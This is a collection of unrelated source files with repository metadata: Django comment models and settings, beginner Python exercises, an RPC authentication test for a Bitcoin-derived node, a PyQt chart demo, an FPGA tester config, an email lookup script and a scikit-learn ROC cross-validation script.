gen.add("max_lin_vel", double_t, 0, "", 0.5, 0.0, 100.0)
gen.add("max_ang_vel", double_t, 0, "", 0.7, 0.0, 100.0)
exit(gen.generate(PACKAGE_NAME, "squirrel_2d_localizer", "TwistCorrection")) | [
"boniardi@informatik.uni-freiburg.de"
] | boniardi@informatik.uni-freiburg.de |
028c10a04ebb2901f7835a15474fdb02878565aa | f6f2576e54f3c4ff9e46be9e97bfe639e5c495cc | /models.py | 841bedc625d02928fec42e114768af8f29e88ccd | [
"MIT"
] | permissive | mback2k/django-app-comments | 2bd77fbec50fe37eb1dca10b45f76de7c46c23bb | 01ba89bf6c59e908a837a48c92575cc2c9f64d1a | refs/heads/master | 2021-01-17T07:10:07.325462 | 2019-04-27T18:17:27 | 2019-04-27T18:17:27 | 24,798,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,502 | py | # -*- coding: utf-8 -*-
from django.db import models
from django.db.models import Q, signals
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone, html, safestring
from django.dispatch import receiver
import urllib.parse, hashlib, datetime
import threading, bleach
class Author(User):
class Meta:
proxy = True
@property
def name(self):
if self.first_name:
return self.first_name
if self.email:
return self.email.split('@', 2)[0]
return self.username
@property
def avatar(self):
if self.email:
strvalue = self.email.lower()
else:
strvalue = self.name
md5hash = hashlib.md5(strvalue.encode('utf-8')).hexdigest()
gravatar_url = "//www.gravatar.com/avatar/%s.jpg?" % md5hash
if self.email:
gravatar_url += urllib.parse.urlencode({'d': 'retro', 's': 64})
else:
gravatar_url += urllib.parse.urlencode({'d': 'retro', 's': 64, 'f': 'y'})
return gravatar_url
class Thread(models.Model):
CATEGORIES = (
('discussion', _('Discussion')),
('request', _('Request')),
('issue', _('Issue')),
)
category = models.CharField(_('Category'), max_length=20, choices=CATEGORIES, default='discussion')
crdate = models.DateTimeField(_('Date created'), auto_now_add=True)
tstamp = models.DateTimeField(_('Date changed'), auto_now=True)
is_closed = models.BooleanField(_('Is closed'), blank=True, default=False)
is_deleted = models.BooleanField(_('Is deleted'), blank=True, default=False)
class Meta:
ordering = ('-crdate', '-tstamp')
def __str__(self):
return self.get_category_display()
def get_absolute_url(self):
thread_kwargs = {'category': self.category, 'thread_id': self.id}
thread_link = reverse('comments:show_posts', kwargs=thread_kwargs)
return thread_link
@property
def first_staff_post(self):
yesterday = timezone.now() - datetime.timedelta(days=1)
return self.posts.filter(parent=None).exclude(Q(is_deleted=True) | Q(is_spam=True), Q(tstamp__lt=yesterday)).get()
@property
def first_active_post(self):
return self.posts.filter(parent=None).exclude(Q(is_deleted=True) | Q(is_spam=True) | Q(is_approved=False)).get()
class Post(models.Model):
parent = models.ForeignKey('self', related_name='posts', blank=True, null=True)
thread = models.ForeignKey(Thread, related_name='posts')
author = models.ForeignKey(Author, related_name='posts')
content = models.TextField(_('Comment'))
content_cleaned = models.TextField(null=True, editable=False)
crdate = models.DateTimeField(_('Date created'), auto_now_add=True)
tstamp = models.DateTimeField(_('Date changed'), auto_now=True)
edited = models.DateTimeField(_('Date edited'), blank=True, null=True)
is_deleted = models.BooleanField(_('Is deleted'), blank=True, default=False)
is_approved = models.BooleanField(_('Is approved'), blank=True, default=False)
is_flagged = models.BooleanField(_('Is flagged'), blank=True, default=False)
is_spam = models.BooleanField(_('Is spam'), blank=True, default=False)
is_highlighted = models.BooleanField(_('Is highlighted'), blank=True, default=False)
cleaner_sem = threading.Semaphore()
cleaner = bleach.Cleaner(tags=('br', 'p', 'a', 'b', 'i', 'strong', 'em'),
filters=[bleach.linkifier.LinkifyFilter])
class Meta:
ordering = ('crdate', 'tstamp')
def __str__(self):
return '%s by %s' % (self.thread, self.author)
def get_absolute_url(self):
thread_kwargs = {'category': self.thread.category, 'thread_id': self.thread.id}
thread_link = reverse('comments:show_posts', kwargs=thread_kwargs)
thread_link_post = '%s#p%d' % (thread_link, self.id)
return thread_link_post
def get_cleaned_content(self):
return self.cleaned_content
get_cleaned_content.allow_tags = True
get_cleaned_content.admin_order_field = content_cleaned
get_cleaned_content.short_description = _('Comment')
def fix_linebreaks(self, content):
content = content.replace('<p>', '')
content = content.replace('</p>', '\n\n')
content = content.replace('<br>', '\n')
content = content.replace('<br/>', '\n')
content = content.replace('<br />', '\n')
return html.linebreaks(content)
def clean_content(self, commit=True):
fixed_linebreaks = self.fix_linebreaks(self.content)
with self.cleaner_sem:
self.content_cleaned = self.cleaner.clean(fixed_linebreaks)
if commit and self.id:
self.save(update_fields=('content_cleaned',))
return self.content_cleaned
@property
def cleaned_content(self):
if not self.content_cleaned:
content = _('This post is still being processed, please give it a few seconds and reload this page.')
return safestring.mark_safe(u'<p>%s</p>' % content)
return self.content_cleaned
@property
def staff_posts(self):
yesterday = timezone.now() - datetime.timedelta(days=1)
return self.posts.exclude(Q(is_deleted=True) | Q(is_spam=True), Q(tstamp__lt=yesterday))
@property
def active_posts(self):
return self.posts.exclude(Q(is_deleted=True) | Q(is_spam=True) | Q(is_approved=False))
@property
def is_editable(self):
if self.thread.is_closed:
return False
yesterday = timezone.now() - datetime.timedelta(days=1)
if self.crdate < yesterday:
return False
if self.posts.exists():
return False
return True
@property
def vote_sum(self):
return self.votes.aggregate(vote_sum=models.Sum('mode'))['vote_sum']
class Vote(models.Model):
MODES = (
( 1, _('Up')),
(-1, _('Down')),
)
post = models.ForeignKey(Post, related_name='votes')
user = models.ForeignKey(User, related_name='votes')
mode = models.SmallIntegerField(_('Mode'), choices=MODES)
class Meta:
unique_together = ('post', 'user')
class Media(models.Model):
post = models.ForeignKey(Post, related_name='media')
image = models.ImageField(_('Image'), upload_to='comments/posts/%Y/%m/%d',
width_field='width', height_field='height',
max_length=250)
width = models.SmallIntegerField(_('Width'))
height = models.SmallIntegerField(_('Height'))
class Attachment(models.Model):
post = models.ForeignKey(Post, related_name='attachments')
file = models.FileField(_('File'), upload_to='comments/posts/%Y/%m/%d',
max_length=250)
@receiver(signals.pre_save, sender=Post)
def handle_post_pre_save_signal(sender, instance, update_fields, **kwargs):
if not update_fields or 'content' in update_fields:
instance.content_cleaned = None
@receiver(signals.post_save, sender=Post)
def handle_post_post_save_signal(sender, instance, update_fields, **kwargs):
from .tasks import clean_post_content
if not instance.content_cleaned:
clean_post_content.apply_async(countdown=1, kwargs={'post_id': instance.id})
| [
"info@marc-hoersken.de"
] | info@marc-hoersken.de |
31974bb9dc65df7814e3e6dde721d7d4a5d22f12 | 1ce29b37fb1bdaa0fb5e464be967153b43735a33 | /ClassworkNotes/Python/basic_strings.py | b8edebd1ccc24f0db6c7d2d4e3c35252812032d3 | [] | no_license | Kushendra1/csci127-assignments | 84c32298496f056dd3babb53d501c2e0a28d07f6 | cd26fbaab0ff89c5158410e533da5176671e87c0 | refs/heads/master | 2020-03-28T03:45:33.313295 | 2018-12-20T15:46:16 | 2018-12-20T15:46:16 | 147,669,145 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | def bondify(name):
"""
takes in a string in the form "first last" and returns it in the form "last, first last"
"""
space_index = name.find(" ")
first = name[0:space_index]
last = name[space_index:]
bond_name = last + "," + first + last
return bond_name
print(bondify("James Bond"))
def capitalize_name(name):
"""
name -> a string in the form "first last" all lowers case
returns -> the string with both names capitalized
ex: james bond -> James Bond
"""
s = "Hello World"
print("s = ", s) #adding two strings to put using one argument
print("Access the first character:", s[0]) #printing two seperate strings
#s[0]="Z" this is illegal, you can't change a string
#slices are parts of a string using the character numbers
#You can't change a string, but you can make a new string and reassign the value of s to it
| [
"Kushendra.Ramrup59@myhunter.cuny.edu"
] | Kushendra.Ramrup59@myhunter.cuny.edu |
2d7eeda797ab89b6dcdc3bdf30a93caba5a6dfab | 53b1e8400e2c1649e719e3c34825c35c78831bbe | /Methods/functions.py | e0cfb80876b9f5def5acd75cd526d934ea85cf99 | [] | no_license | johndward01/Python_Course | 8a35fa1225b9739b74c7960ed0eec30170bf0809 | 42cd4dbbc889d689fcd798d484f37488fa206ea3 | refs/heads/main | 2023-01-30T13:30:43.217127 | 2020-12-11T00:55:42 | 2020-12-11T00:55:42 | 310,707,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,402 | py | # FUNCTIONS
# In Python a function is defined using the def keyword:
# Creating the function
# def greeting(first_name, last_name):
# print(f"Hello, {first_name} {last_name}!")
# Calling the function
# greeting("John", "Ward")
# If you do not know how many arguments that will be passed into your function,
# add a * before the parameter name in the function definition.
# def add(*args):
# result = 0
# for x in args:
# result += x
# print(result)
# add(1,2,3,4,56)
# KEYWORD ARGUMENTS -> **kwargs
# You can also send arguments with the key = value syntax.
# This way the order of the arguments does not matter.
# def print_coordinates(x,y):
# print(f"({x},{y})")
#
# print_coordinates(y = 2, x = 4)
# If you do not know how many keyword arguments that will be passed into your function, add two asterisk: ** before the parameter name in the function definition.
#
# This way the function will receive a dictionary of arguments,
# and can access the items accordingly:
# def my_function(**kwargs):
# print("arg1 is: " + kwargs["arg1"])
#
# my_function(arg2 = "second argument", arg1 = "first argument")
# Default Parameter Value
# If no arguments are given then the default parameter will be used
# def my_function(country = "The United States"):
# print("I am from " + country)
# my_function()
# my_function("Germany")
# my_function("Some random place")
| [
"johndward01@yahoo.com"
] | johndward01@yahoo.com |
5c0c1e4112f6deae0874413137f5c0775304d546 | 8cb83d12ac73a7a1c522fd6281b2dc1989cf738f | /test/functional/multi_rpc.py | 3da655f4e594fdfc6537849db6266d1a7a311ab6 | [
"MIT"
] | permissive | MmyGoal/OHHO | 41e86bb763ab03375a900ce0e3366ffb11e5562d | 6eb808b41e7fb56809e6988e32029a5b379c30dc | refs/heads/master | 2023-01-24T05:52:01.707651 | 2020-12-08T15:28:11 | 2020-12-08T15:28:11 | 291,229,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,977 | py | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import str_to_b64str, assert_equal
import os
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_chain(self):
super().setup_chain()
#Append rpcauth to bitcoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
with open(os.path.join(self.options.tmpdir+"/node0", "ohho.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
with open(os.path.join(self.options.tmpdir+"/node1", "ohho.conf"), 'a', encoding='utf8') as f:
f.write(rpcuser+"\n")
f.write(rpcpassword+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcuser tool
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Use new authpair to confirm both work
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rt's password
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rt
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for rt2
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for rt2
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
# rpcuser and rpcpassword authpair
rpcuserauthpair = "rpcuser💻:rpcpassword🔑"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rpcuser's password
rpcuserauthpair = "rpcuserwrong:rpcpassword"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rpcuser
rpcuserauthpair = "rpcuser:rpcpasswordwrong"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| [
"54119958+markerz99@users.noreply.github.com"
] | 54119958+markerz99@users.noreply.github.com |
79cc6205452c79cfb1cc543f62aed8cc6697d6e1 | 95b9c261c416538063c3e413de7bb40c21ab08c9 | /CommentsApp/forms.py | 68aad2e268c1cc3c3587a401aca57c4675ed7c05 | [] | no_license | Michael41000/CSCapstone | 403ec23e6a6d727d80b7533fdb62bfe3f24747fe | 8309767373ac4d8edf432bdf0de08c510a842dce | refs/heads/master | 2020-12-24T08:54:08.038810 | 2016-12-08T18:22:09 | 2016-12-08T18:22:09 | 73,310,895 | 1 | 0 | null | 2016-11-15T00:51:16 | 2016-11-09T18:37:59 | Python | UTF-8 | Python | false | false | 114 | py | from django import forms
class CommentForm(forms.Form):
comment = forms.CharField(label='Text', max_length=500)
| [
"mrollber@purdue.edu"
] | mrollber@purdue.edu |
96766b767b7e79f7fb5ea45946f0cff5d54bc1c8 | 47dc4152dd163ce751d4703f19bb5339fc1cfb98 | /djchat/settings.py | dae41d6fb978e9e0118e1da42103746c0c1bbbbe | [
"BSD-3-Clause"
] | permissive | michaelXDzhang/pulsar-django | 85cf3437a578b2b198ea2f794d1a1f4db8a78ec1 | 0aa20e1c08b6a782cd634e736e2238776e0c98d5 | refs/heads/master | 2020-07-27T01:06:32.586546 | 2017-11-28T10:18:34 | 2017-11-28T10:18:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,562 | py | """
Django settings for djchat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
APP_DIR = os.path.dirname(__file__)
BASE_DIR = os.path.dirname(APP_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fux9z2i)6ab$b_5*^z@96hdtqfj5=ct7b)m6_6cfrr5g%x#=81'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pulse',
'djchat'
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(APP_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages'
]
}
}
]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'djchat.views.middleware'
)
ROOT_URLCONF = 'djchat.urls'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| [
"luca@quantmind.com"
] | luca@quantmind.com |
81063a6e3d985fbef8bfdf7fa09786028090fef0 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_231/ch45_2020_04_12_23_45_54_626320.py | c4a53b37d17f38d42ea23fb09e36af31d98485ca | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | lista=[]
lista_reversa=[]
a=int(input('digite um numero:'))
i=(0)
while a>0:
lista.append(a)
i+=1
a=int(input('digite um numero:'))
del lista[i]
while i>=0:
lista_reversa.append(lista[i])
i-=1
print(lista_reversa) | [
"you@example.com"
] | you@example.com |
353f6ace23c860944d395acbddc17d45254171ca | 57cdf9b356ef8e498eae4c67b812c3271022d414 | /projects/one_joint_board1/one_joint_board1_pytester/Utilities.py | b3dd8387ede05205ebc7ebdca8f8fd1bb9b87263 | [] | no_license | sirishn/nerf-verilog | 07fb47f5cddfe74d510d11fcd4639b87db585e59 | 7d92ed54d7820ea64a1a2f9f74474c283d99d835 | refs/heads/master | 2020-04-13T03:01:11.506851 | 2018-12-23T20:02:41 | 2018-12-23T20:02:41 | 162,919,335 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,374 | py | from struct import pack, unpack
from PyQt4.QtCore import Qt
VIEWER_REFRESH_RATE = 10 # in ms, This the T for calculating digital freq
PIPE_IN_ADDR = 0x80
BUTTON_RESET = 0
BUTTON_RESET_SIM = 1
BUTTON_ENABLE_SIM = 2
DATA_EVT_CLKRATE = 0
# address name visual_gain type color
CHIN_PARAM = (0x20, 'f_len', 50, 'float32', 'Qt.blue'), \
(0x22, 'f', 1.0, 'float32', 'Qt.red'), \
(0x24, 'i_CN_spkcnt', 1.0, 'int32', 'Qt.green'), \
(0x26, 'i_Combined_spkcnt', 1.0, 'int32', 'Qt.black'), \
(0x28, 'i_MN_emg', 1.0, 'int32', 'Qt.magenta'), \
(0x30, 'i_CN_emg', 1.0, 'int32', 'Qt.darkRed'), \
(0x32, 'i_combined_emg', 1.0, 'int32', 'Qt.darkGray'), \
# (0x36, 'i_emg_mu7', 1.0, 'int32', 'Qt.blue'), \
# (0x28, 'f_force_mu3', 1.0, 'float32', 'Qt.red')
NUM_CHANNEL = len(CHIN_PARAM) # Number of channels
DATA_OUT_ADDR = list(zip(*CHIN_PARAM)[0])
CH_TYPE = list(zip(*CHIN_PARAM)[3])
# trig_id name type default_value
CHOUT_PARAM = (1, 'pps_coef_Ia', 'float32', 3.0), \
(2, 'tau', 'float32', 0.01), \
(3, 'close_loop', 'int32', 0), \
(4, 'gamma_dyn', 'float32', 80.0), \
(5, 'gamma_sta', 'float32', 80.0), \
(6, 'gain_big_MN', 'int32', 4), \
(7, 'gain_med_MN', 'int32', 6), \
(8, 'gain_small_MN', 'int32', 8)
SEND_TYPE = list(zip(*CHOUT_PARAM)[2])
BIT_FILE = "../one_joint_board1_xem6010.bit"
SAMPLING_RATE = 1024
#NUM_NEURON = 512
NUM_NEURON = 128
def ConvertType(val, fromType, toType):
return unpack(toType, pack(fromType, val))[0]
import sys, re
def interp(string):
locals = sys._getframe(1).f_locals
globals = sys._getframe(1).f_globals
for item in re.findall(r'#\{([^}]*)\}', string):
string = string.replace('#{%s}' % item,
str(eval(item, globals, locals)))
return string
| [
"sirish@Gold-Rush.local"
] | sirish@Gold-Rush.local |
89cf43fcdba2962e0c3b290682879d4b9bac3ca5 | 2dbbd1574a209d26f369aa352baf0414aa6817c1 | /Google-IT-Automation/PythonOS/Week5 /Testcases/emails.py | 62eaaa2eaaba4f0c0937a1023cbcab42c0a82caf | [] | no_license | vvbaliga/PythonCourse | b65f2782c8ce892914030f50a49d3ccbabca4703 | 73ac0031911ecd074769b1e1f7dba834144e5014 | refs/heads/master | 2022-11-06T05:42:02.048764 | 2020-06-25T03:04:29 | 2020-06-25T03:04:29 | 228,270,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py |
#!/usr/bin/env python3
# python3 emails_test.py
import csv
import sys
def populate_dictionary(filename):
"""Populate a dictionary with name/email pairs for easy lookup."""
email_dict = {}
with open(filename) as csvfile:
lines = csv.reader(csvfile, delimiter=',')
for row in lines:
name = str(row[0].lower())
email_dict[name] = row[1]
return email_dict
def find_email(argv):
""" Return an email address based on the username given."""
# Create the username based on the command line input.
try:
fullname = str(argv[1] + " " + argv[2])
# Preprocess the data
email_dict = populate_dictionary(
'user_emails.csv')
# If email exists, print it
if email_dict.get(fullname.lower()):
return email_dict.get(fullname.lower())
else:
return " No email address found"
except IndexError:
return "Missing parameters"
def main():
print(find_email(sys.argv))
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | vvbaliga.noreply@github.com |
f22210c8427f7e7a65853ec23b3430b0491d5c34 | c97fc7658c39feb51c0ed42c04783797c8675b8a | /xm_1/qt简单数据可视化.py | 8536d7db1bea48f72b69fae54a0168600924e53b | [] | no_license | githubvit/study | 8bff13b18bea4954e8ed1b4619a091b134b8ff97 | 845e19d1225f1aa51c828b15effac30be42fdc1b | refs/heads/master | 2023-02-20T15:59:19.635611 | 2021-12-15T08:30:54 | 2021-12-15T08:30:54 | 241,928,274 | 1 | 1 | null | 2023-02-02T06:18:48 | 2020-02-20T16:08:06 | Python | UTF-8 | Python | false | false | 1,548 | py | # Qt数据可视化 https://doc.qt.io/qt-5/qtcharts-overview.html
from PySide2 import QtGui, QtWidgets
from PySide2.QtCharts import QtCharts
# 在Qt5.7版本后将Qt Charts加入到了Qt模块中。
# 我们可以方便的使用这个模块,绘制很多样式的图形,比如折线、饼图等,快速实现数据可视化。
# 用Qt Charts绘制,大概分为四个部分:
# 数据(QXYSeries)、QChart(不知怎么称呼)、坐标轴(QAbstractAXis)和视图(QChartView)。
# 要注意的是 QChart要先添加数据(QXYSeries)
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
series = QtCharts.QLineSeries()#定义线条 连续折线图
# 加点 添加数据
series.append(0,0)
series.append(1,7)
series.append(1.2,14)
series.append(1.3,21)
series.append(1.4,28)
series.append(1.5,35)
self.chartView = QtCharts.QChartView() # 定义ui
self.chartView.chart().addSeries(series) # 添加 线条 即 数据
self.chartView.chart().createDefaultAxes() # 创建 坐标轴
series.setColor(QtGui.QColor("salmon")) # 给线条设置颜色 salmon 橙红色,粉橙色
self.setCentralWidget(self.chartView) # 给QMainWindow窗口设置中心部件,必须的
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
w = MainWindow()
w.resize(640, 480)
w.show()
sys.exit(app.exec_()) | [
"sgq523@163.com"
] | sgq523@163.com |
43f0f0b13d9f8bf38f11d2a9376cd611e7b2d20b | dbfa0fb294e652f819ddf5310aa6e64383e55e29 | /roc_cv.py | 3193697a763d48c04040be99fd84340934f0ff65 | [] | no_license | Luiscn/CarcinogenPrediction | 8073f02aea2cf9668774046affb3340f49da3a83 | 6674b5c73d3b2933893fb88128af0c9651c64f85 | refs/heads/master | 2020-04-09T01:37:26.116718 | 2018-12-02T23:13:36 | 2018-12-02T23:13:36 | 159,911,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,829 | py | import numpy as np
from scipy import interp
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.metrics import roc_curve, auc
from sklearn.model_selection import StratifiedKFold
# #############################################################################
# Data IO and generation
os.chdir('/Users/luis/Dropbox/CompBio')
data = sio.loadmat('TGGATES')
os.chdir('/Users/luis/Documents/CompBio/project/py')
ctrlMatrix = data['ctrlMatrix']
highMatrix = data['highMatrix']
relMatrix = highMatrix / ctrlMatrix
relMatrix_store = relMatrix
relMatrix = relMatrix_store
relMatrix = sklearn.preprocessing.normalize(relMatrix, norm='l2', axis=0, copy=True, return_norm=False)
print(relMatrix.shape)
true = np.array(['N', 'Y', 'N', 'Y', 'Y', 'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N', 'Y', 'Y',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N', 'Y', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N',
'N', 'Y', 'N', 'Y', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'Y', 'N',
'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N',
'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'Y', 'Y', 'N', 'Y', 'N', 'N', 'Y',
'N', 'Y', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'N',
'N', 'N', 'N', 'N', 'N', 'Y', 'N', 'Y', 'Y', 'N', 'N', 'N', 'N', 'N',
'Y', 'N', 'N', 'N', 'Y', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'Y',
'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N'])
label = np.zeros(150)
for i in range(150):
if true[i] == 'N':
label[i] = 0
elif true[i] == 'Y':
label[i] = 1
#chi2 feature selection
number_of_features = 100
selector = SelectKBest(chi2, k=number_of_features)
X_new = selector.fit_transform(relMatrix, label)
print(X_new.shape)
#print(selector.get_support(indices=True))
X = X_new
y = label
random_state = np.random.RandomState(0)
# Run classifier with cross-validation and plot ROC curves
cv = StratifiedKFold(n_splits=5)
classifier = svm.SVC(C=1.0, cache_size=2000, class_weight='balanced', coef0=0.0,
decision_function_shape='ovo', gamma='auto', kernel='linear',
max_iter=-1, probability=True, random_state=None, shrinking=True,
tol=0.001, verbose=False)
tprs = []
aucs = []
resolution = 100
mean_fpr = np.linspace(0, 1, resolution)
#fig = plt.figure(dpi=200)
i = 0
for train, test in cv.split(X, y):
probas_ = classifier.fit(X[train], y[train]).predict_proba(X[test])
# Compute ROC curve and area the curve
fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])
tprs.append(interp(mean_fpr, fpr, tpr))
tprs[-1][0] = 0.0
roc_auc = auc(fpr, tpr)
aucs.append(roc_auc)
plt.plot(fpr, tpr, lw=1, alpha=0.3,
label='ROC fold %d (AUC = %0.2f)' % (i+1, roc_auc))
i += 1
plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',
label='Chance', alpha=.8)
mean_tpr = np.mean(tprs, axis=0)
mean_tpr[-1] = 1.0
mean_auc = auc(mean_fpr, mean_tpr)
std_auc = np.std(aucs)
plt.plot(mean_fpr, mean_tpr, color='b',
label=r'Mean ROC (AUC = %0.2f $\pm$ %0.2f)' % (mean_auc, std_auc),
lw=2, alpha=.8)
std_tpr = np.std(tprs, axis=0)
tprs_upper = np.minimum(mean_tpr + std_tpr, 1)
tprs_lower = np.maximum(mean_tpr - std_tpr, 0)
plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,
label=r'$\pm$ 1 std. dev.')
plt.scatter((np.where(mean_tpr==1)[0][0])/resolution,1,marker='*', color='r',s=200)
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic')
plt.legend(loc="lower right")
